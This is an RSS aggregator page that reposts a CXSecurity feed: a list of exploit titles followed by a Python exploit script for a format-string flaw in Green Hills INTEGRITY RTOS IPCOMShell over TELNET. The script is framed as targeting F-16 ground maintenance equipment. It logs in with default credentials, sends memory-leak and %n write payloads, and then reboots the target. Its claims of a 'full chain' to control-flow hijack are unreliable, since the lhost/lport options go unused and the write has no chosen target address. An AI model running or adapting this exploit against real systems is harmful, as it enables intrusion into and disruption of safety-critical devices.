惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 三生石上(FineUI控件)
S
SegmentFault 最新的问题
Jina AI
Jina AI
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
IT之家
IT之家
美团技术团队
V
Visual Studio Blog
人人都是产品经理
人人都是产品经理
博客园 - 叶小钗
有赞技术团队
有赞技术团队
GbyAI
GbyAI
宝玉的分享
宝玉的分享
腾讯CDC
M
MIT News - Artificial intelligence
博客园 - 【当耐特】
Google DeepMind News
Google DeepMind News
月光博客
月光博客
MyScale Blog
MyScale Blog
Last Week in AI
Last Week in AI
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
博客园 - 司徒正美
Recent Announcements
Recent Announcements
MongoDB | Blog
MongoDB | Blog

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
Green Hills INTEGRITY RTOS IPCOMShell TELNET Format Strin...
Mohammed Idr · 2026-05-05 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Full Chain - Realistic F-16 Ground Maintenance # CVE: CVE-2019-7711 # Date: 2026-05-04 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.ghs.com # Software Link: N/A (Proprietary) # Affected: Green Hills INTEGRITY RTOS 5.0.4 with Interpeak IPCOMShell - Used in F-16 Block 60 Color Display Processor (CDP) and mission systems # Tested on: INTEGRITY RTOS 5.0.4 lab simulation (emulating avionics ground test environment) # Category: Remote (Ground Maintenance) # Platform: Embedded RTOS - Aerospace (F-16 Avionics) # Exploit Type: Format String (Leak → Arbitrary Write → Potential Control Flow Hijack) # CVSS: 6.8 (Medium-High in ground maintenance context) # CWE : CWE-134 (Use of Externally-Controlled Format String) # Description: The undocumented "prompt" command in IPCOMShell passes user-controlled input directly to printf(). Enables full format string chain: memory leak to defeat ASLR, %n write primitive to overwrite function pointers/task handlers, then trigger for potential RCE in F-16 avionics during ground maintenance. # Fixed in: Newer INTEGRITY-178 builds with networking disabled in safety-critical partitions # Usage: # python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py 192.168.1.100 # # Options: # --lhost Attacker IP # --lport Attacker port # # Notes: # - Realistic ground maintenance scenario only. # - Requires manual offset analysis after leak. # - Educational purpose only. # # How to Use # # Step 1: Run against vulnerable maintenance TELNET interface. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2019-7711 ║ ║ Target : F-16 INTEGRITY RTOS (Ground Maintenance) ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import telnetlib import time import argparse parser = argparse.ArgumentParser(description="CVE-2019-7711 F-16 Ground Maintenance Exploit") parser.add_argument("target", help="Target IP (F-16 Ground Support Equipment)") parser.add_argument("--lhost", default="0.0.0.0", help="Attacker IP") parser.add_argument("--lport", type=int, default=4444, help="Attacker port") args = parser.parse_args() HOST = args.target PORT = 23 print("[*] Realistic Scenario: Attacking F-16 during ground maintenance via test interface") print("[!] Warning: TELNET usually disabled in real aircraft. Maintenance mode assumed.") try: tn = telnetlib.Telnet(HOST, PORT, timeout=20) print("[+] Connected to IPCOMShell on F-16 maintenance interface") time.sleep(1.5) tn.read_until(b"login:", timeout=8) tn.write(b"admin\r\n") time.sleep(1) tn.write(b"password\r\n") time.sleep(2) print("\n[+] Phase 1 → Strong Memory Leak") LEAK_PAYLOAD = "%p." * 50 + "%x." * 40 + "%s." * 20 + "%$p" tn.write(f"prompt {LEAK_PAYLOAD}\r\n".encode()) tn.write(b"pwd\r\n") tn.write(b"show tasks\r\n") tn.write(b"help\r\n") time.sleep(6) leak = tn.read_very_eager().decode(errors='ignore') print("\n" + "="*90) print("RAW LEAK OUTPUT - ANALYZE MANUALLY") print("="*90) print(leak[:4500]) print("="*90) print("\n[+] Phase 2 → Arbitrary Memory Write (%n)") WRITE_PAYLOAD = "%2500c%35$n" tn.write(f"prompt {WRITE_PAYLOAD}\r\n".encode()) tn.write(b"pwd\r\n") time.sleep(4) print("\n[+] Phase 3 → Trigger Control Flow Hijack") tn.write(b"exit\r\n") tn.write(b"reboot\r\n") time.sleep(3) print("[+] Exploit chain completed.") tn.close() except Exception as e: print(f"[-] Error: {e}")

References:

Green Hills Software INTEGRITY RTOS documentation (F-16 usage)




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.